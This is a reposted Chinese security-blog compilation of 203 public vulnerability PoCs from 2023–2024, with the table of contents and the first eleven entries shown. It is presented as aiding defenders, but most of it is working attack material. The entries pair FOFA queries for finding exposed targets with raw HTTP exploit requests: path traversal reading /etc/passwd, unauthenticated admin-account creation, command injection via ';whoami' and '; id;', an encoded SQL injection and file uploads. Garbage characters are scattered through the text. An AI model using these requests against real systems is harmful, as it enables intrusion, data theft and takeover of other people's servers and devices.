互联网公开漏洞整理202309-202406
1 R# ^9 ^: r+ g0 M, z道一安全 2024-06-05 07:41 北京
, ]) e) ^- k1 _; m) {/ J2 K8 Q9 g以下文章来源于网络安全新视界 ,作者网络安全新视界
$ j; t$ E4 ~: G% h" D
: c/ z1 a8 h% J7 n% h! ]发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。3 ]1 L* s1 H9 `# y# d. O9 q2 r" h4 R
6 {! \1 }9 d! r! E, l F/ P漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
0 J+ N( ?8 [9 h9 Z* T) G l2 p6 f. x. f* `
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
9 Z- f/ |1 J( d* O' A
# o: V. f: g1 w, ^( P文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。4 D. D6 a- w- p
: g8 d8 k" N2 @0 c- I7 f合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。" ^+ w K' X" F9 Z- o
, O* a+ k/ z! ?$ X7 a
6 ~6 y* V1 Q; ?3 t0 ~2 t声明8 p' _) Y, `# @+ \* M, X
; x' y& X% \- ?$ }: M( u2 }( T5 c9 \为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。! \# b- y5 A+ K: h3 A. F; d _8 l
- ^& D) k( S+ X, M有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
$ m; ]$ g; }( n Y) b
9 Q& ~. c3 Q; r$ R l
4 q1 V% c. u. ~( \; T/ n- s! h1 Z% A6 ?7 y
目录+ Z7 y* T$ F/ w q8 ^2 b' H/ _
Q/ C# }3 R4 h% T; Z4 |01; ~+ x7 [' D0 ^
* s! M" n* X; R0 y2 K
1. StarRocks MPP数据库未授权访问6 m3 D. N6 A: K4 Q! w9 g5 k
2. Casdoor系统static任意文件读取
) n8 e4 X$ a6 t8 h( [3 p; x3. EasyCVR智能边缘网关 userlist 信息泄漏
3 O7 x3 Q. ?* g4 z1 [4. EasyCVR视频管理平台存在任意用户添加
' @+ u" R7 a' W; V: f- t! ]5. NUUO NVR 视频存储管理设备远程命令执行+ ~5 x/ ?) r9 }6 O
6. 深信服 NGAF 任意文件读取2 ~. q$ C7 l2 y2 e: L5 |# @
7. 鸿运主动安全监控云平台任意文件下载
; o0 l6 s* G5 U# v( l/ w' L0 Y8. 斐讯 Phicomm 路由器RCE- F% ]6 T7 P& t( J3 f' T. q! x: \4 W- s
9. 稻壳CMS keyword 未授权SQL注入& m1 d3 ~. c) t' ?+ z- N1 m/ `
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' ^4 F; n& b2 b: O
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
9 [- S0 {7 o) o12. Jorani < 1.0.2 远程命令执行$ v3 W9 ]7 S' [
13. 红帆iOffice ioFileDown任意文件读取
( I: B2 b+ X" n, b) j" q! S14. 华夏ERP(jshERP)敏感信息泄露
+ k- H7 o6 |, X# h- m15. 华夏ERP getAllList信息泄露/ w& P' m/ k: r" f( t9 I% _& Z0 d
16. 红帆HFOffice医微云SQL注入) t% x/ \# C F. m
17. 大华 DSS itcBulletin SQL 注入
: ]& m5 P( @- u/ t18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
8 m- H+ C4 I! S; e19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
0 _: P% u; e3 _ Q20. 大华ICC智能物联综合管理平台任意文件读取
) Q( P) c$ R1 ]. U- J; m/ s) G: p21. 大华ICC智能物联综合管理平台random远程代码执行- Y! i( _8 H( W" D* Q, Z
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
, V" J2 C4 S. P1 J3 X$ Q: W6 x, ]23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
1 d) o# ?! U& [% J6 J/ u24. 用友NC 6.5 accept.jsp任意文件上传
* V F) ` \4 x% C3 h25. 用友NC registerServlet JNDI 远程代码执行
6 l7 c% N8 ?, A& Q( y* M26. 用友NC linkVoucher SQL注入& G- `+ A. ]" P" o; m5 c
27. 用友 NC showcontent SQL注入+ P w" j6 p$ X: i S& a- b
28. 用友NC grouptemplet 任意文件上传4 d, z6 X0 X' u2 z' v6 C: j
29. 用友NC down/bill SQL注入
2 N/ Z& a" k8 M9 i% u I; w- \30. 用友NC importPml SQL注入
3 q% B4 m9 W5 r0 c8 k31. 用友NC runStateServlet SQL注入
, d2 m: t" n; w& a* W2 ~0 A32. 用友NC complainbilldetail SQL注入
3 R2 G' O. L# Y! U; H1 p% G; k33. 用友NC downTax/download SQL注入7 \ x$ B, Z j& A) S9 m2 |4 X
34. 用友NC warningDetailInfo接口SQL注入
* \5 m! a3 v9 L! V! E7 T% H35. 用友NC-Cloud importhttpscer任意文件上传
- s; D6 M6 ]1 K. F. R36. 用友NC-Cloud soapFormat XXE
$ @& G$ I/ d# r( x37. 用友NC-Cloud IUpdateService XXE
8 l- B. T% Q% x4 J" Q, d! L38. 用友U8 Cloud smartweb2.RPC.d XXE
6 o' p$ m0 i m q% O2 {. c: ]: C) ?39. 用友U8 Cloud RegisterServlet SQL注入. ~& a. t# i+ F) V0 V5 z
40. 用友U8-Cloud XChangeServlet XXE
+ G3 V; V, x, ?+ t+ O$ z1 y41. 用友U8 Cloud MeasureQueryByToolAction SQL注入; N9 J* L$ [) J$ O' w# ?
42. 用友GRP-U8 SmartUpload01 文件上传
! F. V \- l! j& z) C; m. _43. 用友GRP-U8 userInfoWeb SQL注入致RCE! U! J9 ?8 }" W
44. 用友GRP-U8 bx_dj_check.jsp SQL注入$ j" O1 n h- T! a( T- I* e
45. 用友GRP-U8 ufgovbank XXE
. k) d( l2 a' G8 ~1 O0 S! G46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ T0 U& z' H% M3 A6 m. }/ i
47. 用友GRP A++Cloud 政府财务云 任意文件读取4 F {6 S% M: q9 M! e& `/ H5 G
48. 用友U8 CRM swfupload 任意文件上传4 H7 k z: R; r6 Z0 g
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
( i* u" }3 P. a0 m+ `$ T1 U2 C% U) o5 [50. QDocs Smart School 6.4.1 filterRecords SQL注入" j8 m4 O9 e4 o4 K/ o8 M
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入2 W' u! n* X3 k* q
52. 泛微E-Office json_common.php sql注入$ M1 I7 B y4 j4 \4 Q
53. 迪普 DPTech VPN Service 任意文件上传' o5 j: K' r9 I- X
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
1 S% Q" C0 P0 q% b" |55. 畅捷通T+ getdecallusers信息泄露
/ M' P% k9 B! N) Y/ ~56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE9 Z) C* T0 l8 C5 Z: n
57. 畅捷通T+ keyEdit.aspx SQL注入
; R- @! |$ E3 \- M7 I9 f! x. H58. 畅捷通T+ KeyInfoList.aspx sql注入; T0 c$ F/ h. ^, \: @' ?. r9 p9 ]$ x
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行/ N6 D7 m" B) M9 E: V Q4 g
60. 百卓Smart管理平台 importexport.php SQL注入
) f6 Q0 A0 ]$ T0 |+ I61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
8 C, U' h3 c( F* x* y62. IP-guard WebServer 远程命令执行+ D1 x( w8 r4 v( g: Q
63. IP-guard WebServer任意文件读取
$ Y1 w& E* J, f" ?64. 捷诚管理信息系统CWSFinanceCommon SQL注入
5 w# G( ~. S9 q' z" K3 F+ f, J( @65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过. ]2 x4 Q; ]2 a) v7 j
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
6 O' `6 f& M4 o7 O67. 万户ezOFFICE wpsservlet任意文件上传- @( x% s$ h/ t! [" ?/ f5 x4 B( r6 u
68. 万户ezOFFICE wf_printnum.jsp SQL注入
6 ^+ f2 g2 C8 {" x( ~9 |& C% {5 i69. 万户 ezOFFICE contract_gd.jsp SQL注入
; ]# l' b' S0 ?( e70. 万户ezEIP success 命令执行+ w) \) w( D' s# ] I$ S# I) d7 e
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入5 K/ J4 F. y. [+ a3 R
72. 致远OA getAjaxDataServlet XXE9 ? p; a0 ?* {6 U* z, z! E
73. GeoServer wms远程代码执行: ^4 F+ p) Y; w4 t) \8 a
74. 致远M3-server 6_1sp1 反序列化RCE
) f n2 N7 L9 e- G. b, L75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE* F- I% y8 m( d
76. 新开普掌上校园服务管理平台service.action远程命令执行
9 \& h+ b* j5 Q0 R- l( f$ f77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 o; S7 S2 |6 c4 x7 q1 \2 t
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
. ~' K$ |3 l" e5 p2 Y' H79. BYTEVALUE 百为流控路由器远程命令执行
& c0 s0 X7 Z h: x" Q80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传: L. A3 z% } e* k7 m3 T7 {
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露' k4 t& G0 ?3 r% b# V' H( n
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 k9 K& g F. k; ~83. JeecgBoot testConnection 远程命令执行+ S& q' K5 n! {
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
% I- |2 H# l' B, \$ U& G7 j5 ~85. SysAid On-premise< 23.3.36远程代码执行( m1 A, Q F) a9 R# V
86. 日本tosei自助洗衣机RCE
# H# q; _- a+ p8 [# u7 i87. 安恒明御安全网关aaa_local_web_preview文件上传; K C% }4 }6 z$ C; j: B
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行" H1 K C7 G7 P5 O8 l/ M; Y. L( F
89. 致远互联FE协作办公平台editflow_manager存在sql注入1 ? f* |$ o- k/ f X- v- j% u2 h% _
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
k$ T% s) K- r0 Q6 T9 L- Q6 Y, ]1 S: a91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取$ c' Y& W) ]% u/ H. [/ C4 @, @# z
92. 海康威视运行管理中心session命令执行
8 D+ J" m1 X# U6 N2 A93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 o/ M' o: d- t5 X; y8 }. H
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传5 }8 `, i* j$ W! U$ X2 `+ k' G
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
6 D% w( U- s# E1 v96. Apache OFBiz 18.12.11 groovy 远程代码执行
5 g% |& R# B5 y& o: M" p0 @97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
7 t7 {, n' U& @) g98. SpiderFlow爬虫平台远程命令执行+ D( _8 n" ?: }5 _& p+ C/ U9 N
99. Ncast盈可视高清智能录播系统busiFacade RCE3 O5 g: X2 W# I9 {9 D4 q
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
+ j2 Q; A H3 H- O101. ivanti policy secure-22.6命令注入
$ X6 t1 g. P* I" `/ e102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
3 u6 {% C% s- |, o* l103. Ivanti Pulse Connect Secure VPN XXE
, K P% J2 v) S# l$ g104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露' U. |& }6 h. h7 X+ p4 `6 s5 l
105. SpringBlade v3.2.0 export-user SQL 注入
' U2 D& }) t+ R7 m106. SpringBlade dict-biz/list SQL 注入" A* \$ x* [; u; b5 ~0 c; S2 J
107. SpringBlade tenant/list SQL 注入
: ? Z! | R/ Y4 V+ E! a, M* v108. D-Tale 3.9.0 SSRF
* J% a2 _" T f109. Jenkins CLI 任意文件读取 y9 [! T2 |& {/ x) t% ?/ x% b
110. Goanywhere MFT 未授权创建管理员
7 G7 s1 i( |+ X; `. g/ ]111. WordPress Plugin HTML5 Video Player SQL注入
8 z# t; t" W9 ]; z1 Z# ^' z112. WordPress Plugin NotificationX SQL 注入3 c/ P9 r/ t# Y# M
113. WordPress Automatic 插件任意文件下载和SSRF
J$ D1 j$ K( Q' T$ K% W- e6 `114. WordPress MasterStudy LMS插件 SQL注入" R# Y& F. n+ e6 Z, _) H
115. WordPress Bricks Builder <= 1.9.6 RCE
( t1 t$ n! R" z- q A. j116. wordpress js-support-ticket文件上传: N k' O5 B9 c1 B: k1 [& G: _
117. WordPress LayerSlider插件SQL注入
2 h" p. V5 H! N6 m5 W6 d0 M118. 北京百绰智能S210管理平台uploadfile.php任意文件上传- I8 r3 E i9 ~4 U8 |! U$ h
119. 北京百绰智能S20后台sysmanageajax.php sql注入4 D% }! a- A9 ]+ [7 P
120. 北京百绰智能S40管理平台导入web.php任意文件上传# U( n0 s, ?( I. `8 ~! n: F
121. 北京百绰智能S42管理平台userattestation.php任意文件上传
+ A S- k2 M9 n) l: t; |" H% b' \7 P122. 北京百绰智能s200管理平台/importexport.php sql注入
. J+ W6 r) v. E123. Atlassian Confluence 模板注入代码执行5 G9 c: M) M( q7 h1 W8 q3 |
124. 湖南建研工程质量检测系统任意文件上传8 L. n6 U% ?6 O7 a
125. ConnectWise ScreenConnect身份验证绕过
8 O/ X! v# n% b2 o! J126. Aiohttp 路径遍历+ Z# M% U! g4 j' |$ f# H
127. 广联达Linkworks DataExchange.ashx XXE
9 h! S! r9 [2 _128. Adobe ColdFusion 反序列化
( J' E/ i) M' j: t) W( [129. Adobe ColdFusion 任意文件读取
1 ^; m6 w9 |! b) l130. Laykefu客服系统任意文件上传% h4 C3 o, P. G' B1 x$ P2 J
131. Mini-Tmall <=20231017 SQL注入
, n" | U ~+ j/ o132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
. {" j7 N h2 ]( D P: B133. H5 云商城 file.php 文件上传. a5 X( l) ^& Y, C
134. 网康NS-ASG应用安全网关index.php sql注入$ r7 J% _* f3 e% P5 j8 ]
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( O2 A7 r$ p; h2 s
136. NextChat cors SSRF
" p% c/ ?( r6 R137. 福建科立迅通信指挥调度平台down_file.php sql注入* G. C+ i* }1 w+ i
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
/ f) k2 m) k$ r6 G# h7 M' w3 L7 r, f139. 福建科立讯通信指挥调度平台editemedia.php sql注入
# s; g* H& r( c/ P, E140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入) j5 l% d F! o5 Q/ Q
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
; K3 U$ d7 x7 [# U5 L142. CMSV6车辆监控平台系统中存在弱密码2 i4 \' v: q$ `
143. Netis WF2780 v2.1.40144 远程命令执行
: N: a0 s0 \0 T; A. Z3 L+ Q; f144. D-Link nas_sharing.cgi 命令注入1 H: E1 e. w/ Q; s( ^. y6 A% b
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入' A/ C5 d. y" Q
146. MajorDoMo thumb.php 未授权远程代码执行0 m" b+ Z* d: |/ q6 ?7 v
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历3 V) ?+ U9 T" v, z
148. CrushFTP 认证绕过模板注入
* u# D% ?8 u1 z) x6 S$ y( j: j149. AJ-Report开源数据大屏存在远程命令执行* Z/ K4 R3 ^; w
150. AJ-Report 1.4.0 认证绕过与远程代码执行2 v. C9 U' c- H) _5 [/ v
151. AJ-Report 1.4.1 pageList sql注入
5 [ o; _6 K/ J1 T2 u. d/ o7 b152. Progress Kemp LoadMaster 远程命令执行- a1 E1 X0 [3 b
153. gradio任意文件读取# E, b1 w& d$ j, U, g/ G- X
154. 天维尔消防救援作战调度平台 SQL注入# t3 F" `: b h- Z$ ~( B
155. 六零导航页 file.php 任意文件上传! R _2 K/ D( T" d0 a0 a
156. TBK DVR-4104/DVR-4216 操作系统命令注入: U& v2 q1 R0 N3 k6 s' H
157. 美特CRM upload.jsp 任意文件上传
4 q$ Q+ H, Z: v0 M; m d158. Mura-CMS-processAsyncObject存在SQL注入
m+ u% J" a% |% r) T9 \) q; |, L! n159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传6 a) q# n+ ?& {: f# z! a
160. Sonatype Nexus Repository 3目录遍历与文件读取( f! s. m: J% m7 z" h' w! m
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
# b o& |5 ^2 f$ W0 Y; b162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传( f% |1 I( M+ C1 ` K# [
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
- U5 N! k2 K0 E+ ~" H; P164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传! m/ P% Q1 i1 T* b, ?- O
165. OrangeHRM 3.3.3 SQL 注入, z, K, U2 S7 O. Y. a+ B7 l5 @8 I
166. 中成科信票务管理平台SeatMapHandler SQL注入( L1 {* }# E, k- w9 W
167. 精益价值管理系统 DownLoad.aspx任意文件读取
& f9 N1 |* ]) a4 P% z2 G* W168. 宏景EHR OutputCode 任意文件读取
" J' C- Y% a. o" n5 g( n169. 宏景EHR downlawbase SQL注入8 S; K0 a! n6 b0 o" Q" N+ F7 _( F$ ?
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
) v& z! u% J# a3 p171. 通天星CMSV6车载定位监控平台 SQL注入, g7 Q1 D0 u7 E; D) c& Q
172. DT-高清车牌识别摄像机任意文件读取 |" u- y$ d. @: ]7 k& V
173. Check Point 安全网关任意文件读取
8 p& U4 C( K8 I, I4 ^% t8 t174. 金和OA C6 FileDownLoad.aspx 任意文件读取
8 J \! t1 w8 W2 L, H175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
c3 Z; I% R5 F# O3 L% c176. 电信网关配置管理系统 rewrite.php 文件上传
6 K# ]: @9 L4 p. N3 F" d* V177. H3C路由器敏感信息泄露2 ^# G2 t/ v! Y; V( r. y! C, C
178. H3C校园网自助服务系统-flexfileupload-任意文件上传$ U1 Y/ R. _, \1 g
179. 建文工程管理系统存在任意文件读取6 }" D) H8 R; U6 K a
180. 帮管客 CRM jiliyu SQL注入
) R& S$ q/ \3 h: g9 m) Z' S0 R181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入 R& {2 T, k3 w! J, y
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
4 t( Q2 ^) a' R8 u! j2 H183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* [* d: D, s/ ~: ~% [! z U: Y1 \/ x
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加0 f- T+ W% x% _+ j
185. 瑞友天翼应用虚拟化系统SQL注入6 D* ]: a2 w% J2 u" e
186. F-logic DataCube3 SQL注入
3 A8 j5 u+ e' y187. Mura CMS processAsyncObject SQL注入" a3 t0 T5 F- H
188. 叁体-佳会视频会议 attachment 任意文件读取
$ @- B; T9 N! ~6 ^- `0 l$ G. F& Z( E! ~189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% N; I! `; K" D/ A0 x5 ?190. 短视频矩阵营销系统 poihuoqu 任意文件读取
- K5 @) O# ~' S191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
# g" ?* |) W$ ^! H! n192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
9 i/ M& h8 P. u8 H193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行. i7 }" T5 l& }/ `
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传! i. d' E' J: k$ F
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 Y8 {& i5 r) V- f% G( v( [1 W
196. 河南省风速科技统一认证平台密码重置
) N- z) y) U3 P/ g* N( m% s1 d197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
) h. M3 v( ^) H8 C198. 阿里云盘 WebDAV 命令注入
; W$ |+ Z4 p1 q1 n% V1 Y199. cockpit系统assetsmanager_upload接口 文件上传
0 P" ?8 s( y: T/ ?8 W. x: w200. SeaCMS海洋影视管理系统dmku SQL注入* t+ l' x& P- W- v2 j
201. 方正全媒体新闻采编系统 binary SQL注入
: T+ C1 _7 s1 a, J$ i. {202. 微擎系统 AccountEdit任意文件上传. }) f8 E3 ^7 B
203. 红海云EHR PtFjk 文件上传
) d9 O3 o7 w$ ^+ |; F- z: X( N+ l; B0 N
POC列表- @+ v- F6 R. b$ O J
' l2 ~: B% i4 M) b+ R( t$ M
02
0 n7 t4 J7 ~0 N
- G& v7 E2 U& {" f4 G1. StarRocks MPP数据库未授权访问
. Y! d/ h( p$ |3 z0 m' e- dFOFA :title="StarRocks"
/ a. G3 P4 h1 L% `/ |GET /mem_tracker HTTP/1.1
& Y; s% o4 ?2 v, T* zHost: URL: l) }; W' m+ w, G
7 v# u) e/ m3 |) R: n5 e
/ s2 M& l$ S* l, Q( _. b2. Casdoor系统static任意文件读取7 N9 j1 P0 a. a
FOFA :title="Casdoor"/ S- b1 B& P7 O$ t
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1 w: m" g& t( G& K% W
Host: xx.xx.xx.xx:9999
; m4 ^3 h, K4 [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 ]* L5 |9 y5 z( t- {0 }: [ E
Connection: close
& `# D0 M# ?7 x' l* B9 C. aAccept: */*
X4 e" h) B( R1 q8 g- cAccept-Language: en
3 Q* z% q/ S, F& f- W/ rAccept-Encoding: gzip' p& a% g8 _! p& J
" d( c; y$ d! X6 H8 O
! D9 U& K7 t- A/ g+ v7 j
3. EasyCVR智能边缘网关 userlist 信息泄漏' |+ k- }+ _5 n! F! C9 V( y
FOFA :title="EasyCVR"
2 |; B3 N. f! g* ^( l# c! [GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
1 Z$ {- O/ k+ a1 ~- ?Host: xx.xx.xx.xx, v* t) A4 u. K* @" y: X; s' d
) J# H+ H1 H4 T+ f
7 L6 m1 u, D) y& Q4 f2 [$ B( F a4. EasyCVR视频管理平台存在任意用户添加
' D. U4 e# \ bFOFA :title="EasyCVR"( }2 ~$ @2 e! ^+ B9 Q( {) ?. r# t
. A! i( k2 q( F" F7 spassword更改为自己的密码md59 v; l) p% k( R: V( F$ Q. M
POST /api/v1/adduser HTTP/1.1. E# D3 d7 C5 k- P& l7 G5 k8 s
Host: your-ip
/ L/ t' H0 D0 P7 g9 hContent-Type: application/x-www-form-urlencoded; charset=UTF-85 t3 S: ~" \! w& X+ P/ e
' ]; T" w( I7 g9 ename=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, f* r8 ?) _" q: o$ h3 }
; V! B" A; H6 f( E9 l- T" Q7 q( o
5 \1 R- ]1 y' D# i4 G m( Y% m: C6 ^) K
5. NUUO NVR 视频存储管理设备远程命令执行: J% }- L( i7 k' G/ T9 F
FOFA:title="Network Video Recorder Login"% \! e9 K7 W0 ~8 |) U
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.11 R9 o( J) @! ~6 m! f) E8 P
Host: xx.xx.xx.xx l6 v$ z1 o0 ^* b G$ C- ?
6 T5 O4 `" l9 i- |, }: M( a
: p# H6 ]- c9 K2 B3 b, P
6. 深信服 NGAF 任意文件读取5 F2 e9 l7 r: x* m& c _
FOFA:title="SANGFOR | NGAF"
) d+ D# L( \6 m" hGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
" e, M1 @1 O4 i- b9 K) {2 KHost:, p( ^) J) U o4 m7 Y3 f' e8 \
# |8 [- G/ Q. Y3 i9 K/ p6 I3 e2 F: o! a6 V T, y
7. 鸿运主动安全监控云平台任意文件下载" X8 k( b5 Q0 A4 j9 q
FOFA:body="./open/webApi.html"
9 j/ \/ ]$ w5 I; T$ IGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.11 V1 Z+ Y, z: ?0 d' i; k
Host:% F1 a1 [+ u; r/ {5 L' _2 \3 X! G
4 O! w" I. E0 q9 f' G2 X2 O0 C% r4 `; S( v
8. 斐讯 Phicomm 路由器RCE0 `8 g' \* h7 k6 @
FOFA:icon_hash="-1344736688"
. [% Z9 H1 @& X; t默认账号admin登录后台后,执行操作
8 f, U4 n" W1 r8 c! D2 WPOST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1# L) U+ {0 w `* z! p) r! P( B% z
Host: x.x.x.x
5 |6 H f" Z% b; o; h; I! K+ uCookie: sysauth=第一步登录获取的cookie$ h7 f! }. U# B0 l+ {2 X- n
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
8 J- r) G7 I9 r# h) z1 c {4 pUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
% ?% a3 }2 U$ G0 z Y
2 `% J1 R( S2 r& x: y8 O------WebKitFormBoundaryxbgjoytz
3 ?9 Y# P2 A' f4 kContent-Disposition: form-data; name="wifiRebootEnablestatus"
" T* E! E7 F4 | C2 E8 t# x. i9 f( ?
%s. y6 W+ ~; I: R+ a" c2 ^1 @
------WebKitFormBoundaryxbgjoytz
2 w0 g" a9 @, Y1 v6 J" BContent-Disposition: form-data; name="wifiRebootrange"; [4 o) x/ l; ?- P
w# U5 [9 G: [' p2 c
12:00; id;7 Z4 Y9 K+ G; e. A% A
------WebKitFormBoundaryxbgjoytz
! |& J/ t+ X! p' V- U% x! SContent-Disposition: form-data; name="wifiRebootendrange"
% @9 W9 t( n( u# I* ?! e0 w( H4 u z1 A( m' x) y
%s:
* d. P( }4 s0 v------WebKitFormBoundaryxbgjoytz
. H2 w' L( P/ o, T& oContent-Disposition: form-data; name="cururl2"* H; g; n5 g% T
+ {' ?7 B! X- z9 M. ?$ w. J9 a' b
$ p' P# k: A9 f I. L) f' t1 ]9 ^0 \
------WebKitFormBoundaryxbgjoytz--
) o; W' M; [. B5 x, V
# L5 A7 G7 q" n, C
/ d% v7 F" u1 U1 G, R; P& H0 ^( W8 r& S9. 稻壳CMS keyword 未授权SQL注入
% |6 d4 `0 r9 b* k' \6 J+ Q( AFOFA:app="Doccms") K% K. u. w# t4 {) N2 O
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
) W" _" F/ h$ J. DHost: x.x.x.x
6 J/ C4 L. f% k7 o8 T B' U8 v2 V( [8 w
8 j) |1 y9 v D7 bpayload为下列语句的二次Url编码8 L1 k8 |7 ]$ `/ ~! p3 l
4 g& m* c& u" l+ N, g! q0 g5 Y
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
9 z+ d; \0 K# M$ _! S) O
3 f9 k. F/ h/ X& F4 N8 j10. 蓝凌EIS智慧协同平台api.aspx任意文件上传; \5 q, t" r4 X+ [4 M
FOFA:icon_hash="953405444"
' y2 h$ ?1 o4 a# \$ F& |9 @! ^9 D) V# g! p
文件上传后响应中包含上传文件的路径
) C; n, Q9 p3 Z2 I* d3 V7 ?POST /eis/service/api.aspx?action=saveImg HTTP/1.1
+ d8 \ e9 d" J5 j1 b0 A* wHost: x.x.x.x:xx
" a( x( M8 b# k6 F, CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 d+ e$ D2 [& r: X, U
Content-Length: 1979 S. h) `7 e; [& L/ u
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. g7 g. n/ |; a
Accept-Encoding: gzip, deflate
3 n5 n1 O- @! g' i- B" v: B DAccept-Language: zh-CN,zh;q=0.99 W9 Q: W, R& v
Connection: close5 O( s& y1 X5 E! k
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu
2 T8 s8 i% Q9 b' [6 h- A
* O! P1 [7 R( y2 t1 Z8 D------WebKitFormBoundaryxdgaqmqu
! h6 m/ f) K6 J0 D. TContent-Disposition: form-data; name="file"filename="icfitnya.txt"' A4 b8 n8 s0 X. d; B) g! W
Content-Type: text/html
' r1 z5 j8 F/ s9 N5 k) w, m# s& L* N
jmnqjfdsupxgfidopeixbgsxbf! C2 M5 @9 j- \6 j2 t( U
------WebKitFormBoundaryxdgaqmqu--
, ]# N- d1 _& P8 W# L5 t9 A* x% d) j- K
) q6 @1 _% r" {5 Q
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入 E6 Y' ?' Z3 c, m
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"; X* F# D8 `# c' a+ `+ [; J! B. J
